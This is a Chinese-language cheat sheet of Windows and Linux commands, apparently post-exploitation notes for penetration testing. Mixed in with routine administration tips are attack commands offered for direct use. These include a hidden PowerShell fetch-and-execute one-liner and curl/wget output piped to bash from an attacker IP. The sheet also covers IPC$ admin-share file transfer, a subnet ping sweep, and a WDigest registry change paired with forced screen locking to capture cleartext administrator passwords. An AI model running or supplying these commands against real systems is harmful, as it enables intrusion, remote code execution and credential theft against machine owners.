1. windows
(1) 以命令行的方式开启管理员
cmd:runas /noprofile /user:administrator cmd
(2) 查看wifi密码:
netsh wlan show profiles wifi名 key=clear
(3) IPC管道连接:
命名管道,可以通过ipc进行对主机远程管理和文件传输,基于139、445端口的开放
net use \\IP | 主机名\IPC$ "管理员密码" /user:administrator 管理员必须有设置密码且已经激活
net session(这一步需要管理员)
net use \\IP /del
dir \\IP | 主机名\C$
copy \\IP | 主机名\C$ 文件名 下载文件
copy 文件名 \\IP | 主机名\C$ 上传文件
(4) windows无文件传输:
powershell -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString(‘文件路径‘))"
(5) windows远程下载
bitsadmin /transfer /n http://IP/xx.vbs path
2. linux
(1) 查看防火墙的状态:
systemctl status firewalld
(2) 关闭防火墙:
systemctl stop firewalld
(3) 永久关闭防火墙
systemctl disable firewalld
(4) 重启防火墙
systemctl enable firewalld
(5) 查看端口状态:
ss -antpl | grep 80
-a 显示全部
-n数字显示IP
-t tcp协议
-p 代表PID
-l 监听状态
(6) linux无文件传输:
wget -qO - http://IP/File | bash
curl http://IP/File | bash
(7) 更新
apt-get update
apt-get upgrade
(8) 修改镜像源
vim /etc/apt/sources.list
apt-get update
(9) 改字体颜色
vim ~/.bashrc
PS1=‘\[\e[1;33m\]\u@\h:\[\e[1;32m\]\W\[\e[37m\]#\[\e [m\ ] ‘
(10) 安装pip
apt-get install python3-pip
(11) 程序想要命令直接运行
mv xxx.elf /usr/bin/xxx.elf
(12) 替换ping的代理答应
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all
或sysctl -w net.ipv4.icmp_echo_ignore_all=1 >/dev/null
开启将1改成0
(13) 去访问其他的存活主机
for /L %i in (1,1,254) do @ping -w 1 -n 1 192.168.37.%i | findstr "TTL="
(14) win server >= 2012 无法抓取明文密码:
修改注册表:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /vUseLogonCredential /t REG_DWORD /d 1 /f
强制锁屏让管理员重登入后才可以抓到明文密码:
rundll32 user32.dll,LockWorkStation